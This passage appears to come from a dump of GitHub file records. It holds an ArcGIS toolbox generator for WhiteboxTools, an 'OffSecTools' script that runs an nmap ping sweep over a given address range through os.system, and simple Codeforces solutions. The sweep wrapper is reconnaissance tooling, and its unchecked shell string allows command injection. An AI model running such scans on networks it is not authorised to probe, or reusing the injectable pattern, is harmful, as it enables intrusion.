line.replace(\"not\", \"Not\")\n lines.append(line)\n lines.append(' sys.stdout = old_stdout\\n')\n lines.append(' result_string = result.getvalue()\\n')\n lines.append(' messages.addMessage(result_string)\\n')\n lines.append(' return\\n\\n\\n')\n return lines\n\n\ndef define_tool_params(params):\n '''\n Generate function block for each tool parameter \n '''\n lines = []\n for param in params:\n items = params[param]\n if items['optional'] == 'false':\n parameter_type=\"Required\"\n else:\n parameter_type=\"Optional\"\n \n if 'NewFile' in items['parameter_type']:\n direction=\"Output\"\n else:\n direction=\"Input\"\n\n if param == \"class\": # parameter cannot use Python reserved keyword\n param = \"cls\"\n\n data_type = get_data_type(items['parameter_type'])\n\n # if data_type['multi_value'] and param == \"i\":\n # param = \"inputs\"\n\n if data_type['data_type'] == '\"DERasterDataset\"' and direction == \"Output\":\n data_type['data_type'] = '\"DEFile\"'\n data_type['data_filter'] = '[\"tif\"]'\n parameter_type = \"Required\" # if a filter is used, the parameter must be changed to required.\n elif data_type['data_type'] == '\"DERasterDataset\"' and direction == \"Input\":\n data_type['data_type'] = '\"GPRasterLayer\"'\n elif data_type['data_type'] == '\"DEShapefile\"' and direction == \"Input\":\n data_type['data_type'] = '\"GPFeatureLayer\"'\n elif data_type['data_type'] == '[\"DERasterDataset\", \"GPDouble\"]' and direction == \"Input\":\n data_type['data_type'] = '[\"GPRasterLayer\", \"GPDouble\"]'\n\n if data_type['data_filter'] == '[\"html\"]':\n parameter_type = \"Required\"\n\n lines.append(' {} = arcpy.Parameter(\\n'.format(param))\n lines.append(' displayName=\"{}\",\\n'.format(items['name']))\n lines.append(' name=\"{}\",\\n'.format(param))\n lines.append(' datatype={},\\n'.format(data_type['data_type']))\n lines.append(' parameterType=\"{}\",\\n'.format(parameter_type))\n lines.append(' direction=\"{}\")\\n'.format(direction))\n\n if data_type['multi_value']:\n lines.append(' {}.multiValue = True\\n'.format(param))\n\n if len(data_type['dependency_field']) > 0:\n lines.append(' {}.parameterDependencies = [{}.name]\\n'.format(param, data_type['dependency_field']).replace('input.name', 'i.name'))\n\n if data_type['data_filter'] != '[]':\n if data_type['filter_type'] == '\"ValueList\"':\n lines.append(' {}.filter.type = \"ValueList\"\\n'.format(param))\n\n if (data_type['data_filter'] in ['[\"Point\"]', '[\"Polyline\"]', '[\"Polygon\"]', '[\"las\", \"zip\"]']) and direction == \"Output\":\n pass\n else:\n lines.append(' {}.filter.list = {}\\n'.format(param, data_type['data_filter']))\n\n if (items['default_value'] != 'null') and (len(items['default_value']) > 0):\n if \"false\" in items['default_value']:\n items['default_value'] = False\n elif \"true\" in items['default_value']:\n items['default_value'] = True\n\n lines.append('\\n {}.value = {}\\n\\n'.format(param, items['default_value']))\n else:\n lines.append('\\n')\n \n line = ' params = [{}]\\n\\n'.format(', '.join(params)) \n if \"class\" in line:\n line = line.replace(\", class,\", \", cls,\")\n \n lines.append(line)\n lines = ''.join(lines)\n return lines\n\n\ndef define_execute(params):\n '''\n Accessing tool parameters\n '''\n lines = []\n for index, param in enumerate(params):\n # get the full path to a input raster or vector layer\n param_type = params[param]['parameter_type']\n inputRasVec = []\n inputRasVec.append({'ExistingFile': 'Raster'})\n # inputRasVec.append({'ExistingFileOrFloat': 'Raster'})\n inputRasVec.append({'ExistingFile': {'Vector': 'Point'}})\n inputRasVec.append({'ExistingFile': {'Vector': 'Line'}})\n inputRasVec.append({'ExistingFile': {'Vector': 'Polygon'}})\n inputRasVec.append({'ExistingFile': {'Vector': 'LineOrPolygon'}})\n inputRasVec.append({'ExistingFile': {'Vector': 'Any'}})\n\n optional = False\n\n if \"optional\" in params[param].keys():\n if params[param]['optional'] == 'true':\n optional = True\n\n # deal with multi-value input\n items = params[param]\n data_type = get_data_type(items['parameter_type'])\n # if data_type['multi_value'] and param == 'i':\n # param = \"inputs\"\n\n if param == 'class':\n param = \"cls\"\n\n # deal with multi-value inputs\n lines.append(' {} = parameters[{}].valueAsText\\n'.format(param, index))\n if data_type['multi_value']:\n lines.append(' if {} is not None:\\n'.format(param))\n lines.append(' items = {}.split(\";\")\\n'.format(param))\n lines.append(' items_path = []\\n')\n lines.append(' for item in items:\\n')\n lines.append(' items_path.append(arcpy.Describe(item).catalogPath)\\n')\n lines.append(' {} = \";\".join(items_path)\\n'.format(param))\n\n if param_type in inputRasVec:\n # lines.append(' desc = arcpy.Describe({})\\n'.format(param))\n # lines.append(' {} = desc.catalogPath\\n'.format(param)) \n # if param_type == \"Optional\":\n lines.append(' if {} is not None:\\n'.format(param))\n lines.append(' desc = arcpy.Describe({})\\n'.format(param))\n lines.append(' {} = desc.catalogPath\\n'.format(param)) \n elif param_type == {'ExistingFileOrFloat': 'Raster'}:\n lines.append(' if {} is not None:\\n'.format(param))\n lines.append(' try:\\n') \n lines.append(' {} = str(float({}))\\n'.format(param, param)) \n lines.append(' except:\\n') \n lines.append(' desc = arcpy.Describe({})\\n'.format(param))\n lines.append(' {} = desc.catalogPath\\n'.format(param)) \n \n # lines.append(' if ({} is not None) and {}.isnumeric() == False:\\n'.format(param, param))\n\n # if param == \"cell_size\":\n # print(param)\n\n # if param_type in inputRasVec:\n # lines.append(' if {} is not None:\\n'.format(param))\n # lines.append(' desc = arcpy.Describe({})\\n'.format(param))\n # lines.append(' {} = desc.catalogPath\\n'.format(param)) \n # lines.append(' if (\".gdb\\\\\\\\\" in desc.catalogPath) or (\".mdb\\\\\\\\\" in desc.catalogPath):\\n') \n # lines.append(' arcpy.AddError(\"Datasets stored in a Geodatabase are not supported.\")\\n')\n # elif optional:\n # lines.append(' if {} is None:\\n'.format(param))\n # lines.append(' {} = None\\n'.format(param))\n\n\n lines = ''.join(lines) \n return lines\n\n\ndef get_data_type(param):\n '''\n Convert WhiteboxTools data types to ArcGIS data types\n '''\n data_type = '\"GPString\"' # default data type\n data_filter = '[]' # https://goo.gl/EaVNzg\n filter_type = '\"\"'\n multi_value = False\n dependency_field = ''\n\n # ArcGIS data types: https://goo.gl/95JtFu\n data_types = {\n 'Boolean': '\"GPBoolean\"',\n 'Integer': '\"GPLong\"',\n 'Float': '\"GPDouble\"',\n 'String': '\"GPString\"',\n 'StringOrNumber': '[\"GPString\", \"GPDouble\"]',\n 'Directory': '\"DEFolder\"',\n 'Raster': '\"DERasterDataset\"',\n 'Csv': '\"DEFile\"',\n 'Text': '\"DEFile\"',\n 'Html': '\"DEFile\"',\n 'Lidar': '\"DEFile\"',\n 'Vector': '\"DEShapefile\"',\n 'RasterAndVector': '[\"DERasterDataset\", \"DEShapefile\"]',\n 'ExistingFileOrFloat': '[\"DERasterDataset\", \"GPDouble\"]'\n\n }\n\n vector_filters = {\n 'Point': '[\"Point\"]',\n 'Points': '[\"Point\"]',\n 'Line': '[\"Polyline\"]',\n 'Lines': '[\"Polyline\"]',\n 'Polygon': '[\"Polygon\"]',\n 'Polygons': '[\"Polygon\"]',\n 'LineOrPolygon': '[\"Polyline\", \"Polygon\"]',\n 'Any': '[]'\n }\n\n if type(param) is str:\n data_type = data_types[param]\n\n else:\n for item in param:\n if item == 'FileList':\n multi_value = True\n elif item == 'OptionList':\n filter_type = '\"ValueList\"'\n data_filter = param[item]\n\n if param[item] == 'Csv':\n data_filter = '[\"csv\"]'\n elif param[item] == 'Lidar':\n data_filter = '[\"las\", \"zip\"]'\n elif param[item] == 'Html':\n data_filter = '[\"html\"]'\n\n if type(param[item]) is str:\n data_type = data_types[param[item]]\n elif type(param[item]) is dict:\n sub_item = param[item]\n for sub_sub_item in sub_item:\n data_type = data_types[sub_sub_item]\n if data_type == '\"DEShapefile\"':\n data_filter = vector_filters[sub_item[sub_sub_item]] \n elif item == 'VectorAttributeField':\n data_type = '\"Field\"'\n dependency_field = param[item][1].replace('--', '') \n else:\n data_type = '\"GPString\"'\n\n if param == {'ExistingFileOrFloat': 'Raster'}:\n data_type = '[\"DERasterDataset\", \"GPDouble\"]'\n\n ret = {}\n ret['data_type'] = data_type\n ret['data_filter'] = data_filter\n ret['filter_type'] = filter_type\n ret['multi_value'] = multi_value\n ret['dependency_field'] = dependency_field\n\n return ret\n\n\ndef get_github_url(tool_name, category):\n '''\n Generate source code link on Github \n ''' \n # prefix = \"https://github.com/jblindsay/whitebox-tools/blob/master/src/tools\"\n url = wbt.view_code(tool_name).strip()\n # url = \"{}/{}/{}.rs\".format(prefix, category, tool_name)\n return url\n\n\ndef get_github_tag(tool_name, category):\n '''\n Get GitHub HTML tag\n ''' \n # prefix = \"https://github.com/jblindsay/whitebox-tools/blob/master/src/tools\"\n # url = \"{}/{}/{}.rs\".format(prefix, category, tool_name)\n url = wbt.view_code(tool_name).strip()\n # print(tool_name)\n # if tool_name == \"split_vector_lines\":\n # print(url)\n if \"RUST_BACKTRACE\" in url:\n url = \"https://github.com/jblindsay/whitebox-tools/tree/master/whitebox-tools-app/src/tools\"\n html_tag = \"<a href='{}' target='_blank'>GitHub</a>\".format(url)\n return html_tag\n\n\ndef get_book_url(tool_name, category):\n '''\n Get link to WhiteboxTools User Mannual \n ''' \n prefix = \"https://jblindsay.github.io/wbt_book/available_tools\"\n url = \"{}/{}.html#{}\".format(prefix, category, tool_name)\n return url\n \n\n\ndef get_book_tag(tool_name, category):\n '''\n Get User Manual HTML tag\n ''' \n prefix = \"https://jblindsay.github.io/wbt_book/available_tools\"\n url = \"{}/{}.html#{}\".format(prefix, category, tool_name)\n html_tag = \"<a href='{}' target='_blank'>WhiteboxTools User Manual</a>\".format(url)\n return html_tag\n\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nwbt_dir = os.path.dirname(dir_path)\nroot_dir = os.path.dirname(wbt_dir)\nwbt_win_zip = os.path.join(root_dir, \"WhiteboxTools_win_amd64.zip\")\n\n# wbt_py = os.path.join(dir_path, \"whitebox_tools.py\")\nwbt_py = os.path.join(wbt_dir, \"whitebox_tools.py\")\n\nfile_header_py = os.path.join(dir_path, \"file_header.py\")\nfile_toolbox_py = os.path.join(dir_path, \"file_toolbox.py\")\nfile_tool_py = os.path.join(dir_path, \"file_tool.py\")\nfile_about_py = os.path.join(dir_path, \"file_about.py\")\n\nfile_wbt_py = os.path.join(dir_path, \"WhiteboxTools.py\")\nfile_wbt_pyt = os.path.join(os.path.dirname(os.path.dirname(dir_path)), \"WhiteboxTools.pyt\")\n\nif not os.path.exists(wbt_win_zip):\n print(\"Downloading WhiteboxTools binary ...\")\n url = \"https://www.whiteboxgeo.com/WBT_Windows/WhiteboxTools_win_amd64.zip\"\n urllib.request.urlretrieve(url, wbt_win_zip) # Download WhiteboxTools\nelse:\n print(\"WhiteboxTools binary already exists.\")\n\nprint(\"Decompressing WhiteboxTools_win_amd64.zip ...\")\nwith ZipFile(wbt_win_zip, 'r') as zipObj:\n # Extract all the contents of zip file to the root directory\n zipObj.extractall(root_dir)\n\nMACOSX = os.path.join(root_dir, \"__MACOSX\")\nif os.path.exists(MACOSX):\n shutil.rmtree(MACOSX)\n\ntoolboxes = {\n \"# Data Tools #\": \"Data Tools\",\n \"# GIS Analysis #\": \"GIS Analysis\",\n \"# Geomorphometric Analysis #\": \"Geomorphometric Analysis\",\n \"# Hydrological Analysis #\": \"Hydrological Analysis\",\n \"# Image Processing Tools #\": \"Image Processing Tools\",\n \"# LiDAR Tools #\": \"LiDAR Tools\",\n \"# Math and Stats Tools #\": \"Math and Stats Tools\",\n \"# Precision Agriculture #\": \"Precision Agriculture\",\n \"# Stream Network Analysis #\": \"Stream Network Analysis\"\n}\n\ngithub_cls = {\n \"Data Tools\": \"data_tools\",\n \"GIS Analysis\": \"gis_analysis\",\n \"Geomorphometric Analysis\": \"terrain_analysis\",\n \"Hydrological Analysis\": \"hydro_analysis\",\n \"Image Processing Tools\": \"image_analysis\",\n \"LiDAR Tools\": \"lidar_analysis\",\n \"Math and Stats Tools\": \"math_stat_analysis\",\n \"Precision Agriculture\": \"precision_agriculture\",\n \"Stream Network Analysis\": \"stream_network_analysis\"\n}\n\nbook_cls = {\n \"Data Tools\": \"data_tools\",\n \"GIS Analysis\": \"gis_analysis\",\n \"Geomorphometric Analysis\": \"geomorphometric_analysis\",\n \"Hydrological Analysis\": \"hydrological_analysis\",\n \"Image Processing Tools\": \"image_processing_tools\",\n \"LiDAR Tools\": \"lidar_tools\",\n \"Math and Stats Tools\": \"mathand_stats_tools\",\n \"Precision Agriculture\": \"precision_agriculture\",\n \"Stream Network Analysis\": \"stream_network_analysis\"\n}\n\n\n\n\n\ntools_dict = {}\ntool_labels = []\ncategory = ''\n\ntool_index = 1\n\nwith open(wbt_py) as f:\n lines = f.readlines()\n\n for index, line in enumerate(lines):\n if index > 360: \n line = line.strip()\n\n if line in toolboxes:\n category = toolboxes[line]\n \n if line.startswith(\"def\"):\n func_title = line.replace(\"def\", \"\", 1).strip().split(\"(\")[0]\n func_name = to_camelcase(func_title)\n\n func_label = to_label(func_title)\n tool_labels.append(func_label)\n func_desc = lines[index+1].replace('\"\"\"', '').strip()\n\n \n github_tag = get_github_tag(func_title, github_cls[category])\n book_tag = get_book_tag(func_name, book_cls[category])\n full_desc = \"{} View detailed help documentation on {} and source code on {}.\".format(func_desc, book_tag, github_tag)\n\n func_dict = {}\n func_dict['name'] = func_name\n func_dict[\"category\"] = category\n func_dict[\"label\"] = func_label\n func_dict[\"description\"] = full_desc\n \n tool_index = tool_index + 1\n func_params = get_tool_params(func_name)\n func_dict[\"parameters\"] = func_params\n tools_dict[func_name] = func_dict\n\nwrite_header(file_header_py, tool_labels)\n\nf_wbt = open(file_wbt_py, \"w\")\n\n# write toolbox header\nwith open(file_header_py) as f:\n lines = f.readlines()\n f_wbt.writelines(lines)\n\n# write toolbox class\nwith open(file_toolbox_py) as f:\n lines = f.readlines()\n f_wbt.writelines(lines)\n\n# write tool class\nfor tool_name in tools_dict.keys():\n f_wbt.write(\" tools.append({})\\n\".format(tool_name))\nf_wbt.write(\"\\n self.tools = tools\\n\\n\\n\")\n\nwith open(file_about_py) as f:\n lines = f.readlines()\n f_wbt.writelines(lines)\n\nfor tool_name in tools_dict:\n lines = generate_tool_template(tools_dict[tool_name])\n f_wbt.writelines(lines)\n\nf_wbt.close()\n\n# copy WhiteboxTools.py to WhiteboxTool.pyt (final ArcGIS Python Toolbox)\nif os.path.exists(file_wbt_pyt):\n os.remove(file_wbt_pyt)\n shutil.copyfile(file_wbt_py, file_wbt_pyt)"
}
] | 1 |
leveryd/OffSecTools
|
https://github.com/leveryd/OffSecTools
|
570e62beac4b7d24241e2a477078157004500826
|
2b5fa4d0393f5a51974216ac4b2bd54a9ed5b17a
|
f13b34c56ec7b7f39d24e96ae464ae49a54af0cf
|
refs/heads/master
| 2021-01-15T21:14:15.104206 | 2015-05-01T15:32:16 | 2015-05-01T15:32:16 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5587044358253479,
"alphanum_fraction": 0.6153846383094788,
"avg_line_length": 16.714284896850586,
"blob_id": "07a6a63e187a72dd16fd8f2bccf35a1ba4c75038",
"content_id": "a0515e96155389142c4490345c0ec1b2d530b403",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 247,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/null_ping.py",
"repo_name": "leveryd/OffSecTools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n__author__ = 'admanne'\nimport sys\nimport os\n\nif len(sys.argv) != 2:\n print \"null_ping <range>\"\n print \"null_ping 192.168.1.1-255\"\n sys.exit(0)\n\naddr = sys.argv[1].strip()\n\ncmd = 'nmap -sP ' + str(addr)\nos.system(cmd)"
}
] | 1 |
victor-soto/codeforces
|
https://github.com/victor-soto/codeforces
|
8a375a1b3844f4468ddcc33d48800f6dd6f825d8
|
77f092488085db895b7be2c463d10a88e5bf44a6
|
f0272fe171256422382d8858106b32137db3ad53
|
refs/heads/master
| 2023-03-20T02:18:49.845977 | 2021-03-15T22:42:38 | 2021-03-15T22:42:47 | 272,117,365 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6510416865348816,
"alphanum_fraction": 0.6614583134651184,
"avg_line_length": 18.25,
"blob_id": "55a11a07d31c095c70fb904690f5bbd46ef78fd2",
"content_id": "3ad13b2edbb3c94892c17dcb06ad594efbbebb59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 20,
"path": "/tram.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/116/A\nimport sys\ninput = sys.stdin.readline\n\ndef inp():\n return(int(input()))\n\ndef read_lines(n):\n return [sys.stdin.readline().strip() for _ in range(n)]\n\nn=inp()\nlines=read_lines(n)\nstops=[]\nfor i in range(n):\n a,b=map(int,lines[i].split())\n if len(stops):\n stops.append(stops[i-1]-a+b)\n else:\n stops.append(b)\nprint(max(stops))"
},
{
"alpha_fraction": 0.6105263233184814,
"alphanum_fraction": 0.6631578803062439,
"avg_line_length": 23,
"blob_id": "538ceb5ac2b7a8be0bf0c0c519b1639820565572",
"content_id": "2325bcb11556877e3dc6fd9c7bc00cfed811711a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 95,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 4,
"path": "/word_capitalization.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/281/A\n\nn = input()\nprint(n[0].upper() + n[1:len(n)])"
},
{
"alpha_fraction": 0.6489361524581909,
"alphanum_fraction": 0.6808510422706604,
"avg_line_length": 30.33333396911621,
"blob_id": "4b6f05e00e2be5aa7a610c6d0fccdfa4f9f95f33",
"content_id": "f00c6097bb845f504c8c17ce5f9d0af6c7dfc624",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 3,
"path": "/helpful_maths.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/339/A\n\nprint('+'.join(sorted(input().split('+'))))\n"
},
{
"alpha_fraction": 0.6342592835426331,
"alphanum_fraction": 0.6620370149612427,
"avg_line_length": 23.11111068725586,
"blob_id": "cbd382a10d24a71d56d3eaf38505fe7a3226f8db",
"content_id": "55bacecdac0fc68ba4753da63b34fefd41247b76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 216,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 9,
"path": "/next_round.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/158/A\n\ndef inlt():\n return(list(map(int,input().split())))\n\nn = inlt()\nparticipants = inlt()\n\nprint(len([x for x in participants if x >= participants[n[1]-1] and x > 0]))"
},
{
"alpha_fraction": 0.6100917458534241,
"alphanum_fraction": 0.642201840877533,
"avg_line_length": 17.16666603088379,
"blob_id": "85763adb59ddf8a64ff4c2853fb3c8dac4587eef",
"content_id": "35417a173c6e4016421961abe817c5ca1901c98e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 12,
"path": "/stones_on_the_table.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/266/A\n\nn=int(input())\ns=input()\nreplacements = 0\npivot = s[0]\nfor i in range(1,len(s)):\n if pivot == s[i]:\n replacements += 1\n else:\n pivot = s[i]\nprint(replacements)\n"
},
{
"alpha_fraction": 0.5838926434516907,
"alphanum_fraction": 0.6308724880218506,
"avg_line_length": 20.428571701049805,
"blob_id": "7a59c6577aa7f34837781d1a81370203fb870381",
"content_id": "1db929e7b64c886ba89dfab4cd49c0c21edcbaf8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 149,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 7,
"path": "/bitpp.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/282/A\ntotal = 0\n\nfor _ in [0]*int(input()):\n total = total + (1 if '++' in input() else -1)\n\nprint(total)"
},
{
"alpha_fraction": 0.49187934398651123,
"alphanum_fraction": 0.5313224792480469,
"avg_line_length": 18.590909957885742,
"blob_id": "33566558c51a2b97da2bdc11e37ea28f686128f4",
"content_id": "a1ddfba08e03d8ed6ac8eca1558be2fa9191bd6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 22,
"path": "/queue_at_the_school.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/266/B\nimport sys\n\ndef read_lines(n):\n return [sys.stdin.readline().strip() for _ in range(n)]\n\ninp = read_lines(2)\nc = inp[0].split(' ')[0]\nt = int(inp[0].split(' ')[1])\nqueue = list(inp[1])\n\nwhile t > 0:\n i = 0\n while i < len(queue) - 1:\n if queue[i] == 'B' and queue[i+1] == 'G':\n queue[i] = 'G'\n queue[i+1] = 'B'\n i += 1\n i += 1\n t -= 1\n\nprint(''.join(queue))\n"
},
{
"alpha_fraction": 0.652482271194458,
"alphanum_fraction": 0.673758864402771,
"avg_line_length": 25.5,
"blob_id": "e7cf129369da8c5f9c35c3271e9ca8579b0de974",
"content_id": "11ba1c923fdc50bceddf1130db800689796d91bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 423,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 16,
"path": "/way_too_long_words.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/71/A\nimport sys\ninput = sys.stdin.readline\n\ndef inp():\n return(int(input()))\n\ndef read_lines(n):\n return [sys.stdin.readline().strip() for _ in range(n)]\n\nn = inp()\nlines = read_lines(n)\nformatted_lines = []\nfor line in lines:\n formatted_lines.append(line[0] + str(len(line[1:len(line)-2])+1) + line[len(line)-1] if len(line) > 10 else line)\nprint(*formatted_lines, sep = \"\\n\")"
},
{
"alpha_fraction": 0.540145993232727,
"alphanum_fraction": 0.6058394312858582,
"avg_line_length": 14.222222328186035,
"blob_id": "59cba27d1a571b1533363b5765c96afe07eee35b",
"content_id": "7ae9b3a6de8318618c42b1916f8724c164e4c438",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 137,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 9,
"path": "/bear_and_big_brother.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/791/A\nn=input().split()\na,b=int(n[0]),int(n[1])\nc=0\nwhile a<=b:\n a*=3\n b*=2\n c+=1\nprint(c)\n"
},
{
"alpha_fraction": 0.6388888955116272,
"alphanum_fraction": 0.6759259104728699,
"avg_line_length": 35,
"blob_id": "9ca8bb6ff26c03c0a41155bd7c75e28839598b56",
"content_id": "7437a4c47d0828fc7a44d589af751d22739f6e9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 9,
"path": "/beautiful_matrix.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/263/A\nimport sys\n\ndef read_lines(n):\n return [sys.stdin.readline().strip() for _ in range(n)]\n\nlines = read_lines(5)\npositions = [(index, row.index('1')) for index, row in enumerate([x.split() for x in lines]) if '1' in row]\nprint(abs(2-positions[0][0]) + abs(2-positions[0][1]))\n"
},
{
"alpha_fraction": 0.6225489974021912,
"alphanum_fraction": 0.6323529481887817,
"avg_line_length": 24.5,
"blob_id": "ac75310fa49b7fb247d82092e6232dd9306007d5",
"content_id": "c90985695a1b7f53b51313b38ad01285906f3302",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 204,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 8,
"path": "/word.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/59/A\n\nn = input()\narr = []\nfor i in n:\n arr.append(i.isupper())\n\nprint(n.upper() if len([a for a in arr if a]) > len([a for a in arr if not a]) else n.lower())\n"
},
{
"alpha_fraction": 0.5533333420753479,
"alphanum_fraction": 0.6200000047683716,
"avg_line_length": 24,
"blob_id": "096004bd318115613e9d1bf4e5d82a8267b86588",
"content_id": "a5c867e9dbf4e5f47ca52e55613c065474d1bb8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 6,
"path": "/soldier_and_bananas.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/546/A\n\ni=input().split()\nk,n,w=int(i[0]),int(i[1]),int(i[2])\nr=int(k*(w*(w+1)/2))-n\nprint(r if r>0 else 0)\n"
},
{
"alpha_fraction": 0.5602836608886719,
"alphanum_fraction": 0.609929084777832,
"avg_line_length": 46,
"blob_id": "3854f457e5b13ac0e280010918284b00085472e3",
"content_id": "5ae214f8b94d31bea5b12acdbaa501eecc057fd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 141,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 3,
"path": "/nearly_lucky_number.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/110/A\n\nprint('YES' if len([x for x in list(input()) if x == '4' or x == '7']) in [4,7] else 'NO')\n"
},
{
"alpha_fraction": 0.5858585834503174,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 32,
"blob_id": "4085dcb6c587facdc6ea1757dbae322eae1624c5",
"content_id": "dba1fd0036ceedbc671c7a02db82e58222865ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 3,
"path": "/elephant.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/617/A\nn=int(input())\nprint(n//5 + (0 if n%5==0 else 1))\n"
},
{
"alpha_fraction": 0.6336336135864258,
"alphanum_fraction": 0.6516516804695129,
"avg_line_length": 40.625,
"blob_id": "9807683216388f14e0f78664772a9c70417422ec",
"content_id": "571452c534388e86f0be76bac439af387734faef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 333,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 8,
"path": "/petya_and_strings.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/112/A\nfirst, second = input(), input()\nif first.lower() == second.lower():\n print(0)\nelse:\n first, second = first.lower(), second.lower()\n pos = next((i for i in range(len(first)) if first[i].lower() != second[i].lower()) , None)\n print(-1 if ord(first[pos]) < ord(second[pos]) else 1)\n"
},
{
"alpha_fraction": 0.6220930218696594,
"alphanum_fraction": 0.6424418687820435,
"avg_line_length": 17.157894134521484,
"blob_id": "14d2e057674f6821fa02a2cb95bc9f4f41cbc437",
"content_id": "d552239f86493e5c596601f61c03fff7ed332ae5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 344,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 19,
"path": "/team.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/231/A\nimport sys\ninput = sys.stdin.readline\n\ndef inp():\n return(int(input()))\n\ndef read_lines(n):\n return [sys.stdin.readline().strip() for _ in range(n)]\n\nn = inp()\nlines = read_lines(n)\ntotal = 0\n\nfor line in lines:\n if len([x for x in line.split() if x == '1']) > 1:\n total += 1\n\nprint(total)"
},
{
"alpha_fraction": 0.6371307969093323,
"alphanum_fraction": 0.6624472737312317,
"avg_line_length": 22.799999237060547,
"blob_id": "117305c088d4be6b297c9f57a002d13c694e9987",
"content_id": "662054a55655e0952622665af8847d52fafa52bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 10,
"path": "/watermelon.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "# https://codeforces.com/problemset/problem/4/A\nimport sys\ninput = sys.stdin.readline\n\ndef inp():\n return(int(input()))\n\nn = inp()\neven_numbers = [i for i in range(2,n) if i%2==0]\nprint('YES' if any(even_numbers) and n%2 == 0 else 'NO')"
},
{
"alpha_fraction": 0.5460993051528931,
"alphanum_fraction": 0.6241135001182556,
"avg_line_length": 22.5,
"blob_id": "1482bfbce51c7194fdea31624604fdf6f66e7e6f",
"content_id": "fc442cba5281031586586c4f6ef066da711946d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 141,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 6,
"path": "/wrong_subtraction.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/977/A\nn,k=map(int,input().split())\nwhile k > 0:\n n = n//10 if n%10 == 0 else n-1\n k-=1\nprint(n)\n"
},
{
"alpha_fraction": 0.6954545378684998,
"alphanum_fraction": 0.7181817889213562,
